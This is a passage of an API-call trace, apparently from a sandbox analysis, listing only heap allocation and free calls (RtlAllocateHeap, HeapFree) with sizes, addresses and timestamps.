Flags=0x8, Size=0x84) returned 0x106030 [0036.508] RtlAllocateHeap (HeapHandle=0xe0000, Flags=0x8, Size=0x84) returned 0x106270 [0036.508] RtlAllocateHeap (HeapHandle=0xe0000, Flags=0x8, Size=0x84) returned 0x106300 [0036.508] RtlAllocateHeap (HeapHandle=0xe0000, Flags=0x8, Size=0x84) returned 0x1073b0 [0036.508] RtlAllocateHeap (HeapHandle=0xe0000, Flags=0x8, Size=0x84) returned 0x107a70 [0036.508] RtlAllocateHeap (HeapHandle=0xe0000, Flags=0x8, Size=0x84) returned 0x107440 [0036.508] RtlAllocateHeap (HeapHandle=0xe0000, Flags=0x8, Size=0x84) returned 0x107290 [0036.508] RtlAllocateHeap (HeapHandle=0xe0000, Flags=0x8, Size=0x84) returned 0x106fc0 [0036.508] RtlAllocateHeap (HeapHandle=0xe0000, Flags=0x8, Size=0x84) returned 0x106ea0 [0036.512] HeapFree (in: hHeap=0xe0000, dwFlags=0x0, lpMem=0x106420 | out: hHeap=0xe0000) returned 1 [0036.512] HeapFree (in: hHeap=0xe0000, dwFlags=0x0, lpMem=0x1064b0 | out: hHeap=0xe0000) returned 1 [0036.512] HeapFree (in: hHeap=0xe0000, dwFlags=0x0, lpMem=0x106390 | out: hHeap=0xe0000) returned 1 [0036.512] HeapFree (in: hHeap=0xe0000, dwFlags=0x0, lpMem=0x1057c0 | out: hHeap=0xe0000) returned 1 [0036.512] HeapFree (in: hHeap=0xe0000, dwFlags=0x0, lpMem=0x106150 | out: hHeap=0xe0000) returned 1 [0036.512] HeapFree (in: hHeap=0xe0000, dwFlags=0x0, lpMem=0x105fa0 | out: hHeap=0xe0000) returned 1 [0036.512] HeapFree (in: hHeap=0xe0000, dwFlags=0x0, lpMem=0x105b20 | out: hHeap=0xe0000) returned 1 [0036.512] HeapFree (in: hHeap=0xe0000, dwFlags=0x0, lpMem=0x1058e0 | out: hHeap=0xe0000) returned 1 [0036.512] HeapFree (in: hHeap=0xe0000, dwFlags=0x0, lpMem=0x105e80 | out: hHeap=0xe0000) returned 1 [0036.512] HeapFree (in: hHeap=0xe0000, dwFlags=0x0, lpMem=0x105850 | out: hHeap=0xe0000) returned 1 [0036.512] HeapFree (in: hHeap=0xe0000, dwFlags=0x0, lpMem=0x105a00 | out: hHeap=0xe0000) returned 1 [0036.512] HeapFree (in: hHeap=0xe0000, dwFlags=0x0, lpMem=0x105970 | out: hHeap=0xe0000) returned 1 [0036.512] HeapFree (in: hHeap=0xe0000, dwFlags=0x0, lpMem=0x105bb0 | out: hHeap=0xe0000) returned 1 [0036.512] HeapFree (in: hHeap=0xe0000, dwFlags=0x0, lpMem=0x1056a0 | out: hHeap=0xe0000) returned 1 [0036.512] HeapFree (in: hHeap=0xe0000, dwFlags=0x0, lpMem=0x1065d0 | out: hHeap=0xe0000) returned 1 [0036.512] HeapFree (in: hHeap=0xe0000, dwFlags=0x0, lpMem=0x105c40 | out: hHeap=0xe0000) returned 1 [0036.512] HeapFree (in: hHeap=0xe0000, dwFlags=0x0, lpMem=0x105cd0 | out: hHeap=0xe0000) returned 1 [0036.512] HeapFree (in: hHeap=0xe0000, dwFlags=0x0, lpMem=0x1061e0 | out: hHeap=0xe0000) returned 1 [0036.512] HeapFree (in: hHeap=0xe0000, dwFlags=0x0, lpMem=0x105d60 | out: hHeap=0xe0000) returned 1 [0036.512] HeapFree (in: hHeap=0xe0000, dwFlags=0x0, lpMem=0x1060c0 | out: hHeap=0xe0000) returned 1 [0036.512] HeapFree (in: hHeap=0xe0000, dwFlags=0x0, lpMem=0x105730 | out: hHeap=0xe0000) returned 1 [0036.512] HeapFree (in: hHeap=0xe0000, dwFlags=0x0, lpMem=0x105df0 | out: hHeap=0xe0000) returned 1 [0036.512] HeapFree (in: hHeap=0xe0000, dwFlags=0x0, lpMem=0x105f10 | out: hHeap=0xe0000) returned 1 [0036.512] HeapFree (in: hHeap=0xe0000, dwFlags=0x0, lpMem=0x106030 | out: hHeap=0xe0000) returned 1 [0036.512] HeapFree (in: hHeap=0xe0000, dwFlags=0x0, lpMem=0x106270 | out: hHeap=0xe0000) returned 1 [0036.512] HeapFree (in: hHeap=0xe0000, dwFlags=0x0, lpMem=0x106300 | out: hHeap=0xe0000) returned 1 [0036.512] HeapFree (in: hHeap=0xe0000, dwFlags=0x0, lpMem=0x1073b0 | out: hHeap=0xe0000) returned 1 [0036.512] HeapFree (in: hHeap=0xe0000, dwFlags=0x0, lpMem=0x107a70 | out: hHeap=0xe0000) returned 1 [0036.512] HeapFree (in: hHeap=0xe0000, dwFlags=0x0, lpMem=0x107440 | out: hHeap=0xe0000) returned 1 [0036.512] HeapFree (in: hHeap=0xe0000, dwFlags=0x0, lpMem=0x107290 | out: hHeap=0xe0000) returned 1 [0036.512] HeapFree (in: hHeap=0xe0000, dwFlags=0x0, lpMem=0x106fc0 | out: hHeap=0xe0000) returned 1 [0036.512] HeapFree (in: hHeap=0xe0000, dwFlags=0x0, lpMem=0x106ea0 | out: hHeap=0xe0000) returned 1 [0036.512] HeapFree (in: hHeap=0xe0000, dwFlags=0x0, lpMem=0x106540 | out: hHeap=0xe0000) returned 1 [0036.512] HeapFree (in: hHeap=0xe0000, dwFlags=0x0, lpMem=0x108bc8 | out: hHeap=0xe0000) returned 1 [0036.512] HeapFree (in: hHeap=0xe0000, dwFlags=0x0, lpMem=0x102040 | out: hHeap=0xe0000) returned 1 [0036.512] HeapFree (in: hHeap=0xe0000, dwFlags=0x0, lpMem=0x101518 | out: hHeap=0xe0000) returned 1 [0036.512] HeapFree (in: hHeap=0xe0000, dwFlags=0x0, lpMem=0x105a90 | out: hHeap=0xe0000) returned 1 [0036.512] HeapFree (in: hHeap=0xe0000, dwFlags=0x0, lpMem=0x108ce0 | out: hHeap=0xe0000) returned 1 [0036.513] RtlAllocateHeap (HeapHandle=0xe0000, Flags=0x8, Size=0x80) returned 0x101b78 [0036.513] RtlAllocateHeap (HeapHandle=0xe0000, Flags=0x8, Size=0x80) returned 0x101fb8 [0036.513] RtlAllocateHeap (HeapHandle=0xe0000, Flags=0x8, Size=0x80) returned 0x101518 [0036.513] RtlAllocateHeap (HeapHandle=0xe0000, Flags=0x8, Size=0x84) returned 0x105d60 [0036.513] HeapFree (in: hHeap=0xe0000, dwFlags=0x0, lpMem=0x101518 | out: hHeap=0xe0000) returned 1 [0036.513] RtlAllocateHeap (HeapHandle=0xe0000, Flags=0x8, Size=0x84) returned 0x106270 [0036.513] RtlAllocateHeap (HeapHandle=0xe0000, Flags=0x8, Size=0x108) returned 0x1098e8 [0036.513] RtlAllocateHeap (HeapHandle=0xe0000, Flags=0x8, Size=0x4) returned 0xf6f70 [0036.513] RtlAllocateHeap (HeapHandle=0xe0000, Flags=0x8, Size=0x104) returned 0x109028 [0036.513] HeapFree (in: hHeap=0xe0000, dwFlags=0x0, lpMem=0xf6f70 | out: hHeap=0xe0000) returned 1 [0036.513] RtlAllocateHeap (HeapHandle=0xe0000, Flags=0x8, Size=0x104) returned 0x108ce0 [0036.513] RtlAllocateHeap (HeapHandle=0xe0000, Flags=0x8, Size=0x80) returned 0x1021d8 [0036.513] RtlAllocateHeap (HeapHandle=0xe0000, Flags=0x8, Size=0x10c) returned 0x1097d0 [0036.513] RtlAllocateHeap (HeapHandle=0xe0000, Flags=0x8, Size=0x8) returned 0xf6f70 [0036.513] RtlAllocateHeap (HeapHandle=0xe0000, Flags=0x8, Size=0xc) returned 0x103bd8 [0036.513] RtlAllocateHeap (HeapHandle=0xe0000, Flags=0x8, Size=0x84) returned 0x105df0 [0036.513] HeapFree (in: hHeap=0xe0000, dwFlags=0x0, lpMem=0x1021d8 | out: hHeap=0xe0000) returned 1 [0036.513] RtlAllocateHeap (HeapHandle=0xe0000, Flags=0x8, Size=0x104) returned 0x109370 [0036.513] HeapFree (in: hHeap=0xe0000, dwFlags=0x0, lpMem=0x105df0 | out: hHeap=0xe0000) returned 1 [0036.513] RtlAllocateHeap (HeapHandle=0xe0000, Flags=0x8, Size=0x8) returned 0x105550 [0036.513] RtlAllocateHeap (HeapHandle=0xe0000, Flags=0x8, Size=0xc) returned 0x103ab8 [0036.513] HeapFree (in: hHeap=0xe0000, dwFlags=0x0, lpMem=0xf6f70 | out: hHeap=0xe0000) returned 1 [0036.513] HeapFree (in: hHeap=0xe0000, dwFlags=0x0, lpMem=0x105550 | out: hHeap=0xe0000) returned 1 [0036.513] RtlAllocateHeap (HeapHandle=0xe0000, Flags=0x8, Size=0x88) returned 0x105850 [0036.513] HeapFree (in: hHeap=0xe0000, dwFlags=0x0, lpMem=0x103ab8 | out: hHeap=0xe0000) returned 1 [0036.513] RtlAllocateHeap (HeapHandle=0xe0000, Flags=0x8, Size=0x104) returned 0x108ab0 [0036.513] HeapFree (in: hHeap=0xe0000, dwFlags=0x0, lpMem=0x105850 | out: hHeap=0xe0000) returned 1 [0036.514] RtlAllocateHeap (HeapHandle=0xe0000, Flags=0x8, Size=0x8) returned 0xf6f70 [0036.514] HeapFree (in: hHeap=0xe0000, dwFlags=0x0, lpMem=0xf6f70 | out: hHeap=0xe0000) returned 1 [0036.514] RtlAllocateHeap (HeapHandle=0xe0000, Flags=0x8, Size=0x8) returned 0xf6f70 [0036.514] HeapFree (in: hHeap=0xe0000, dwFlags=0x0, lpMem=0xf6f70 | out: hHeap=0xe0000) returned 1 [0036.514] RtlAllocateHeap (HeapHandle=0xe0000, Flags=0x8, Size=0x8) returned 0xf6f70 [0036.514] HeapFree (in: hHeap=0xe0000, dwFlags=0x0, lpMem=0xf6f70 | out: hHeap=0xe0000) returned 1 [0036.514] RtlAllocateHeap (HeapHandle=0xe0000, Flags=0x8, Size=0x8) returned 0xf6f70 [0036.514] HeapFree (in: hHeap=0xe0000, dwFlags=0x0, lpMem=0xf6f70 | out: hHeap=0xe0000) returned 1 [0036.514] RtlAllocateHeap (HeapHandle=0xe0000, Flags=0x8, Size=0x8) returned 0xf6f70 [0036.514] HeapFree (in: hHeap=0xe0000, dwFlags=0x0, lpMem=0xf6f70 | out: hHeap=0xe0000) returned 1 [0036.514] RtlAllocateHeap (HeapHandle=0xe0000, Flags=0x8, Size=0x8) returned 0xf6f70 [0036.514] HeapFree (in: hHeap=0xe0000, dwFlags=0x0, lpMem=0xf6f70 | out: hHeap=0xe0000) returned 1 [0036.514] RtlAllocateHeap (HeapHandle=0xe0000, Flags=0x8, Size=0x8) returned 0xf6f70 [0036.514] HeapFree (in: hHeap=0xe0000, dwFlags=0x0, lpMem=0xf6f70 | out: hHeap=0xe0000) returned 1 [0036.514] RtlAllocateHeap (HeapHandle=0xe0000, Flags=0x8, Size=0x8) returned 0xf6f70 [0036.514] HeapFree (in: hHeap=0xe0000, dwFlags=0x0, lpMem=0xf6f70 | out: hHeap=0xe0000) returned 1 [0036.514] RtlAllocateHeap (HeapHandle=0xe0000, Flags=0x8, Size=0x8) returned 0xf6f70 [0036.514] HeapFree (in: hHeap=0xe0000, dwFlags=0x0, lpMem=0xf6f70 | out: hHeap=0xe0000) returned 1 [0036.514] RtlAllocateHeap (HeapHandle=0xe0000, Flags=0x8, Size=0x8) returned 0xf6f70 [0036.514] HeapFree (in: hHeap=0xe0000, dwFlags=0x0, lpMem=0xf6f70 | out: hHeap=0xe0000) returned 1 [0036.514] RtlAllocateHeap (HeapHandle=0xe0000, Flags=0x8, Size=0x8) returned 0xf6f70 [0036.514] HeapFree (in: hHeap=0xe0000, dwFlags=0x0, lpMem=0xf6f70 | out: hHeap=0xe0000) returned 1 [0036.514] RtlAllocateHeap (HeapHandle=0xe0000, Flags=0x8, Size=0x8) returned 0xf6f70 [0036.514] HeapFree (in: hHeap=0xe0000, dwFlags=0x0, lpMem=0xf6f70 | out: hHeap=0xe0000) returned 1 [0036.514] RtlAllocateHeap (HeapHandle=0xe0000, Flags=0x8, Size=0x8) returned 0xf6f70 [0036.514] HeapFree (in: hHeap=0xe0000, dwFlags=0x0, lpMem=0xf6f70 | out: hHeap=0xe0000) returned 1 [0036.514] RtlAllocateHeap (HeapHandle=0xe0000, Flags=0x8, Size=0x8) returned 0xf6f70 [0036.514] HeapFree (in: hHeap=0xe0000, dwFlags=0x0, lpMem=0xf6f70 | out: hHeap=0xe0000) returned 1 [0036.514] RtlAllocateHeap (HeapHandle=0xe0000, Flags=0x8, Size=0x8) returned 0xf6f70 [0036.514] HeapFree (in: hHeap=0xe0000, dwFlags=0x0, lpMem=0xf6f70 | out: hHeap=0xe0000) returned 1 [0036.514] RtlAllocateHeap (HeapHandle=0xe0000, Flags=0x8, Size=0x8) returned 0xf6f70 [0036.514] HeapFree (in: hHeap=0xe0000, dwFlags=0x0, lpMem=0xf6f70 | out: hHeap=0xe0000) returned 1 [0036.514] RtlAllocateHeap (HeapHandle=0xe0000, Flags=0x8, Size=0x8) returned 0xf6f70 [0036.514] HeapFree (in: hHeap=0xe0000, dwFlags=0x0, lpMem=0xf6f70 | out: hHeap=0xe0000) returned 1 [0036.514] RtlAllocateHeap (HeapHandle=0xe0000, Flags=0x8, Size=0x8) returned 0xf6f70 [0036.514] HeapFree (in: hHeap=0xe0000, dwFlags=0x0, lpMem=0xf6f70 | out: hHeap=0xe0000) returned 1 [0036.514] RtlAllocateHeap (HeapHandle=0xe0000, Flags=0x8, Size=0x8) returned 0xf6f70 [0036.514] HeapFree (in: hHeap=0xe0000, dwFlags=0x0, lpMem=0xf6f70 | out: hHeap=0xe0000) returned 1 [0036.514] RtlAllocateHeap (HeapHandle=0xe0000, Flags=0x8, Size=0x8) returned 0xf6f70 [0036.514] HeapFree (in: hHeap=0xe0000, dwFlags=0x0, lpMem=0xf6f70 | out: hHeap=0xe0000) returned 1 [0036.515] RtlAllocateHeap (HeapHandle=0xe0000, Flags=0x8, Size=0x8) returned 0xf6f70 [0036.515] HeapFree (in: hHeap=0xe0000, dwFlags=0x0, lpMem=0xf6f70 | out: hHeap=0xe0000) returned 1 [0036.515] RtlAllocateHeap (HeapHandle=0xe0000, Flags=0x8, Size=0x8) returned 0xf6f70 [0036.515] HeapFree (in: hHeap=0xe0000, dwFlags=0x0, lpMem=0xf6f70 | out: hHeap=0xe0000) returned 1 [0036.515] RtlAllocateHeap (HeapHandle=0xe0000, Flags=0x8, Size=0x8) returned 0xf6f70 [0036.515] HeapFree (in: hHeap=0xe0000, dwFlags=0x0, lpMem=0xf6f70 | out: hHeap=0xe0000) returned 1 [0036.515] RtlAllocateHeap (HeapHandle=0xe0000, Flags=0x8, Size=0x8) returned 0xf6f70 [0036.515] HeapFree (in: hHeap=0xe0000, dwFlags=0x0, lpMem=0xf6f70 | out: hHeap=0xe0000) returned 1 [0036.515] RtlAllocateHeap (HeapHandle=0xe0000, Flags=0x8, Size=0x8) returned 0xf6f70 [0036.515] HeapFree (in: hHeap=0xe0000, dwFlags=0x0, lpMem=0xf6f70 | out: hHeap=0xe0000) returned 1 [0036.515] RtlAllocateHeap (HeapHandle=0xe0000, Flags=0x8, Size=0x8) returned 0xf6f70 [0036.515] HeapFree (in: hHeap=0xe0000, dwFlags=0x0, lpMem=0xf6f70 | out: hHeap=0xe0000) returned 1 [0036.515] RtlAllocateHeap (HeapHandle=0xe0000, Flags=0x8, Size=0x8) returned 0xf6f70 [0036.515] HeapFree (in: hHeap=0xe0000, dwFlags=0x0, lpMem=0xf6f70 | out: hHeap=0xe0000) returned 1 [0036.515] RtlAllocateHeap (HeapHandle=0xe0000, Flags=0x8, Size=0x8) returned 0xf6f70 [0036.515] HeapFree (in: hHeap=0xe0000, dwFlags=0x0, lpMem=0xf6f70 | out: hHeap=0xe0000) returned 1 [0036.515] RtlAllocateHeap (HeapHandle=0xe0000, Flags=0x8, Size=0x8) returned 0xf6f70 [0036.515] HeapFree (in: hHeap=0xe0000, dwFlags=0x0, lpMem=0xf6f70 | out: hHeap=0xe0000) returned 1 [0036.515] RtlAllocateHeap (HeapHandle=0xe0000, Flags=0x8, Size=0x8) returned 0xf6f70 [0036.515] HeapFree (in: hHeap=0xe0000, dwFlags=0x0, lpMem=0xf6f70 | out: hHeap=0xe0000) returned 1 [0036.515] RtlAllocateHeap (HeapHandle=0xe0000, Flags=0x8, Size=0x8) returned 0xf6f70 [0036.515] HeapFree (in: hHeap=0xe0000, dwFlags=0x0, lpMem=0xf6f70 | out: hHeap=0xe0000) returned 1 [0036.515] RtlAllocateHeap (HeapHandle=0xe0000, Flags=0x8, Size=0x8) returned 0xf6f70 [0036.515] HeapFree (in: hHeap=0xe0000, dwFlags=0x0, lpMem=0xf6f70 | out: hHeap=0xe0000) returned 1 [0036.515] RtlAllocateHeap (HeapHandle=0xe0000, Flags=0x8, Size=0x8) returned 0xf6f70 [0036.515] HeapFree (in: hHeap=0xe0000, dwFlags=0x0, lpMem=0xf6f70 | out: hHeap=0xe0000) returned 1 [0036.515] RtlAllocateHeap (HeapHandle=0xe0000, Flags=0x8, Size=0x8) returned 0xf6f70 [0036.515] HeapFree (in: hHeap=0xe0000, dwFlags=0x0, lpMem=0xf6f70 | out: hHeap=0xe0000) returned 1 [0036.515] RtlAllocateHeap (HeapHandle=0xe0000, Flags=0x8, Size=0x8) returned 0xf6f70 [0036.515] HeapFree (in: hHeap=0xe0000, dwFlags=0x0, lpMem=0xf6f70 | out: hHeap=0xe0000) returned 1 [0036.515] HeapFree (in: hHeap=0xe0000, dwFlags=0x0, lpMem=0x108ce0 | out: hHeap=0xe0000) returned 1 [0036.515] HeapFree (in: hHeap=0xe0000, dwFlags=0x0, lpMem=0x109370 | out: hHeap=0xe0000) returned 1 [0036.515] HeapFree (in: hHeap=0xe0000, dwFlags=0x0, lpMem=0x1097d0 | out: hHeap=0xe0000) returned 1 [0036.515] HeapFree (in: hHeap=0xe0000, dwFlags=0x0, lpMem=0x108ab0 | out: hHeap=0xe0000) returned 1 [0036.515] HeapFree (in: hHeap=0xe0000, dwFlags=0x0, lpMem=0x103bd8 | out: hHeap=0xe0000) returned 1 [0036.515] RtlAllocateHeap (HeapHandle=0xe0000, Flags=0x8, Size=0x84) returned 0x105bb0 [0036.515] RtlAllocateHeap (HeapHandle=0xe0000, Flags=0x8, Size=0x84) returned 0x106420 [0036.515] RtlAllocateHeap (HeapHandle=0xe0000, Flags=0x8, Size=0x84) returned 0x106150 [0036.515] RtlAllocateHeap (HeapHandle=0xe0000, Flags=0x8, Size=0x84) returned 0x105970 [0036.515] RtlAllocateHeap (HeapHandle=0xe0000, Flags=0x8, Size=0x84) returned 0x1058e0 [0036.516] RtlAllocateHeap (HeapHandle=0xe0000, Flags=0x8, Size=0x84) returned 0x105b20 [0036.516] RtlAllocateHeap (HeapHandle=0xe0000, Flags=0x8, Size=0x84) returned 0x106390 [0036.516] RtlAllocateHeap (HeapHandle=0xe0000, Flags=0x8, Size=0x84) returned 0x105fa0 [0036.516] RtlAllocateHeap (HeapHandle=0xe0000, Flags=0x8, Size=0x84) returned 0x105a00 [0036.516] RtlAllocateHeap (HeapHandle=0xe0000, Flags=0x8, Size=0x84) returned 0x105a90 [0036.516] RtlAllocateHeap (HeapHandle=0xe0000, Flags=0x8, Size=0x84) returned 0x1064b0 [0036.516] RtlAllocateHeap (HeapHandle=0xe0000, Flags=0x8, Size=0x84) returned 0x106540 [0036.516] RtlAllocateHeap (HeapHandle=0xe0000, Flags=0x8, Size=0x84) returned 0x1065d0 [0036.516] RtlAllocateHeap (HeapHandle=0xe0000, Flags=0x8, Size=0x84) returned 0x106300 [0036.516] RtlAllocateHeap (HeapHandle=0xe0000, Flags=0x8, Size=0x84) returned 0x1056a0 [0036.516] RtlAllocateHeap (HeapHandle=0xe0000, Flags=0x8, Size=0x84) returned 0x105730 [0036.516] RtlAllocateHeap (HeapHandle=0xe0000, Flags=0x8, Size=0x84) returned 0x105df0 [0036.516] RtlAllocateHeap (HeapHandle=0xe0000, Flags=0x8, Size=0x84) returned 0x1060c0 [0036.516] RtlAllocateHeap (HeapHandle=0xe0000, Flags=0x8, Size=0x84) returned 0x105c40 [0036.516] RtlAllocateHeap (HeapHandle=0xe0000, Flags=0x8, Size=0x84) returned 0x105cd0 [0036.516] RtlAllocateHeap (HeapHandle=0xe0000, Flags=0x8, Size=0x84) returned 0x1057c0 [0036.516] RtlAllocateHeap (HeapHandle=0xe0000, Flags=0x8, Size=0x84) returned 0x105e80 [0036.516] RtlAllocateHeap (HeapHandle=0xe0000, Flags=0x8, Size=0x84) returned 0x105f10 [0036.519] RtlAllocateHeap (HeapHandle=0xe0000, Flags=0x8, Size=0x84) returned 0x105850 [0036.519] RtlAllocateHeap (HeapHandle=0xe0000, Flags=0x8, Size=0x84) returned 0x106030 [0036.519] RtlAllocateHeap (HeapHandle=0xe0000, Flags=0x8, Size=0x84) returned 0x1061e0 [0036.519] RtlAllocateHeap (HeapHandle=0xe0000, Flags=0x8, Size=0x84) returned 0x107680 [0036.519] RtlAllocateHeap (HeapHandle=0xe0000, Flags=0x8, Size=0x84) returned 0x106f30 [0036.519] RtlAllocateHeap (HeapHandle=0xe0000, Flags=0x8, Size=0x84) returned 0x106ea0 [0036.519] RtlAllocateHeap (HeapHandle=0xe0000, Flags=0x8, Size=0x84) returned 0x107290 [0036.519] RtlAllocateHeap (HeapHandle=0xe0000, Flags=0x8, Size=0x84) returned 0x107710 [0036.519] RtlAllocateHeap (HeapHandle=0xe0000, Flags=0x8, Size=0x84) returned 0x106b40 [0036.525] HeapFree (in: hHeap=0xe0000, dwFlags=0x0, lpMem=0x105bb0 | out: hHeap=0xe0000) returned 1 [0036.525] HeapFree (in: hHeap=0xe0000, dwFlags=0x0, lpMem=0x106420 | out: hHeap=0xe0000) returned 1 [0036.525] HeapFree (in: hHeap=0xe0000, dwFlags=0x0, lpMem=0x106150 | out: hHeap=0xe0000) returned 1 [0036.525] HeapFree (in: hHeap=0xe0000, dwFlags=0x0, lpMem=0x105970 | out: hHeap=0xe0000) returned 1 [0036.525] HeapFree (in: hHeap=0xe0000, dwFlags=0x0, lpMem=0x1058e0 | out: hHeap=0xe0000) returned 1 [0036.525] HeapFree (in: hHeap=0xe0000, dwFlags=0x0, lpMem=0x105b20 | out: hHeap=0xe0000) returned 1 [0036.525] HeapFree (in: hHeap=0xe0000, dwFlags=0x0, lpMem=0x106390 | out: hHeap=0xe0000) returned 1 [0036.525] HeapFree (in: hHeap=0xe0000, dwFlags=0x0, lpMem=0x105fa0 | out: hHeap=0xe0000) returned 1 [0036.526] HeapFree (in: hHeap=0xe0000, dwFlags=0x0, lpMem=0x105a00 | out: hHeap=0xe0000) returned 1 [0036.526] HeapFree (in: hHeap=0xe0000, dwFlags=0x0, lpMem=0x105a90 | out: hHeap=0xe0000) returned 1 [0036.526] HeapFree (in: hHeap=0xe0000, dwFlags=0x0, lpMem=0x1064b0 | out: hHeap=0xe0000) returned 1 [0036.526] HeapFree (in: hHeap=0xe0000, dwFlags=0x0, lpMem=0x106540 | out: hHeap=0xe0000) returned 1 [0036.526] HeapFree (in: hHeap=0xe0000, dwFlags=0x0, lpMem=0x1065d0 | out: hHeap=0xe0000) returned 1 [0036.526] HeapFree (in: hHeap=0xe0000, dwFlags=0x0, lpMem=0x106300 | out: hHeap=0xe0000) returned 1 [0036.526] HeapFree (in: hHeap=0xe0000, dwFlags=0x0, lpMem=0x1056a0 | out: hHeap=0xe0000) returned 1 [0036.526] HeapFree (in: hHeap=0xe0000, dwFlags=0x0, lpMem=0x105730 | out: hHeap=0xe0000) returned 1 [0036.526] HeapFree (in: hHeap=0xe0000, dwFlags=0x0, lpMem=0x105df0 | out: hHeap=0xe0000) returned 1 [0036.526] HeapFree (in: hHeap=0xe0000, dwFlags=0x0, lpMem=0x1060c0 | out: hHeap=0xe0000) returned 1 [0036.526] HeapFree (in: hHeap=0xe0000, dwFlags=0x0, lpMem=0x105c40 | out: hHeap=0xe0000) returned 1 [0036.526] HeapFree (in: hHeap=0xe0000, dwFlags=0x0, lpMem=0x105cd0 | out: hHeap=0xe0000) returned 1 [0036.526] HeapFree (in: hHeap=0xe0000, dwFlags=0x0, lpMem=0x1057c0 | out: hHeap=0xe0000) returned 1 [0036.526] HeapFree (in: hHeap=0xe0000, dwFlags=0x0, lpMem=0x105e80 | out: hHeap=0xe0000) returned 1 [0036.526] HeapFree (in: hHeap=0xe0000, dwFlags=0x0, lpMem=0x105f10 | out: hHeap=0xe0000) returned 1 [0036.526] HeapFree (in: hHeap=0xe0000, dwFlags=0x0, lpMem=0x105850 | out: hHeap=0xe0000) returned 1 [0036.526] HeapFree (in: hHeap=0xe0000, dwFlags=0x0, lpMem=0x106030 | out: hHeap=0xe0000) returned 1 [0036.526] HeapFree (in: hHeap=0xe0000, dwFlags=0x0, lpMem=0x1061e0 | out: hHeap=0xe0000) returned 1 [0036.526] HeapFree (in: hHeap=0xe0000, dwFlags=0x0, lpMem=0x107680 | out: hHeap=0xe0000) returned 1 [0036.526] HeapFree (in: hHeap=0xe0000, dwFlags=0x0, lpMem=0x106f30 | out: hHeap=0xe0000) returned 1 [0036.526] HeapFree (in: hHeap=0xe0000, dwFlags=0x0, lpMem=0x106ea0 | out: hHeap=0xe0000) returned 1 [0036.526] HeapFree (in: hHeap=0xe0000, dwFlags=0x0, lpMem=0x107290 | out: hHeap=0xe0000) returned 1 [0036.526] HeapFree (in: hHeap=0xe0000, dwFlags=0x0, lpMem=0x107710 | out: hHeap=0xe0000) returned 1 [0036.526] HeapFree (in: hHeap=0xe0000, dwFlags=0x0, lpMem=0x106b40 | out: hHeap=0xe0000) returned 1 [0036.526] HeapFree (in: hHeap=0xe0000, dwFlags=0x0, lpMem=0x106270 | out: hHeap=0xe0000) returned 1 [0036.526] HeapFree (in: hHeap=0xe0000, dwFlags=0x0, lpMem=0x1098e8 | out: hHeap=0xe0000) returned 1 [0036.526] HeapFree (in: hHeap=0xe0000, dwFlags=0x0, lpMem=0x101b78 | out: hHeap=0xe0000) returned 1 [0036.526] HeapFree (in: hHeap=0xe0000, dwFlags=0x0, lpMem=0x101fb8 | out: hHeap=0xe0000) returned 1 [0036.526] HeapFree (in: hHeap=0xe0000, dwFlags=0x0, lpMem=0x105d60 | out: hHeap=0xe0000) returned 1 [0036.526] HeapFree (in: hHeap=0xe0000, dwFlags=0x0, lpMem=0x109028 | out: hHeap=0xe0000) returned 1 [0036.526] RtlAllocateHeap (HeapHandle=0xe0000, Flags=0x8, Size=0x80) returned 0x101d98 [0036.526] RtlAllocateHeap (HeapHandle=0xe0000, Flags=0x8, Size=0x80) returned 0x101380 [0036.527] RtlAllocateHeap (HeapHandle=0xe0000, Flags=0x8, Size=0x80) returned 0x102260 [0036.527] RtlAllocateHeap (HeapHandle=0xe0000, Flags=0x8, Size=0x84) returned 0x105d60 [0036.527] HeapFree (in: hHeap=0xe0000, dwFlags=0x0, lpMem=0x102260 | out: hHeap=0xe0000) returned 1 [0036.527] RtlAllocateHeap (HeapHandle=0xe0000, Flags=0x8, Size=0x84) returned 0x105850 [0036.527] RtlAllocateHeap (HeapHandle=0xe0000, Flags=0x8, Size=0x108) returned 0x1097d0 [0036.527] RtlAllocateHeap (HeapHandle=0xe0000, Flags=0x8, Size=0x4) returned 0xf6f70 [0036.527] RtlAllocateHeap (HeapHandle=0xe0000, Flags=0x8, Size=0x104) returned 0x109028 [0036.527] HeapFree (in: hHeap=0xe0000, dwFlags=0x0, lpMem=0xf6f70 | out: hHeap=0xe0000) returned 1 [0036.527] RtlAllocateHeap (HeapHandle=0xe0000, Flags=0x8, Size=0x104) returned 0x108ab0 [0036.527] RtlAllocateHeap (HeapHandle=0xe0000, Flags=0x8, Size=0x80) returned 0x1021d8 [0036.527] RtlAllocateHeap (HeapHandle=0xe0000, Flags=0x8, Size=0x10c) returned 0x108df8 [0036.527] RtlAllocateHeap (HeapHandle=0xe0000, Flags=0x8, Size=0x8) returned 0xf6f70 [0036.527] RtlAllocateHeap (HeapHandle=0xe0000, Flags=0x8, Size=0xc) returned 0x103ad0 [0036.527] RtlAllocateHeap (HeapHandle=0xe0000, Flags=0x8, Size=0x84) returned 0x106030 [0036.527] HeapFree (in: hHeap=0xe0000, dwFlags=0x0, lpMem=0x1021d8 | out: hHeap=0xe0000) returned 1 [0036.527] RtlAllocateHeap (HeapHandle=0xe0000, Flags=0x8, Size=0x104) returned 0x109140 [0036.527] HeapFree (in: hHeap=0xe0000, dwFlags=0x0, lpMem=0x106030 | out: hHeap=0xe0000) returned 1 [0036.527] RtlAllocateHeap (HeapHandle=0xe0000, Flags=0x8, Size=0x8) returned 0x105240 [0036.527] RtlAllocateHeap (HeapHandle=0xe0000, Flags=0x8, Size=0xc) returned 0x103b90 [0036.527] HeapFree (in: hHeap=0xe0000, dwFlags=0x0, lpMem=0xf6f70 | out: hHeap=0xe0000) returned 1 [0036.527] HeapFree (in: hHeap=0xe0000, dwFlags=0x0, lpMem=0x105240 | out: hHeap=0xe0000) returned 1 [0036.527] RtlAllocateHeap (HeapHandle=0xe0000, Flags=0x8, Size=0x88) returned 0x105970 [0036.527] HeapFree (in: hHeap=0xe0000, dwFlags=0x0, lpMem=0x103b90 | out: hHeap=0xe0000) returned 1 [0036.527] RtlAllocateHeap (HeapHandle=0xe0000, Flags=0x8, Size=0x104) returned 0x1095a0 [0036.527] HeapFree (in: hHeap=0xe0000, dwFlags=0x0, lpMem=0x105970 | out: hHeap=0xe0000) returned 1 [0036.527] RtlAllocateHeap (HeapHandle=0xe0000, Flags=0x8, Size=0x8) returned 0xf6f70 [0036.527] HeapFree (in: hHeap=0xe0000, dwFlags=0x0, lpMem=0xf6f70 | out: hHeap=0xe0000) returned 1 [0036.527] RtlAllocateHeap (HeapHandle=0xe0000, Flags=0x8, Size=0x8) returned 0xf6f70 [0036.527] HeapFree (in: hHeap=0xe0000, dwFlags=0x0, 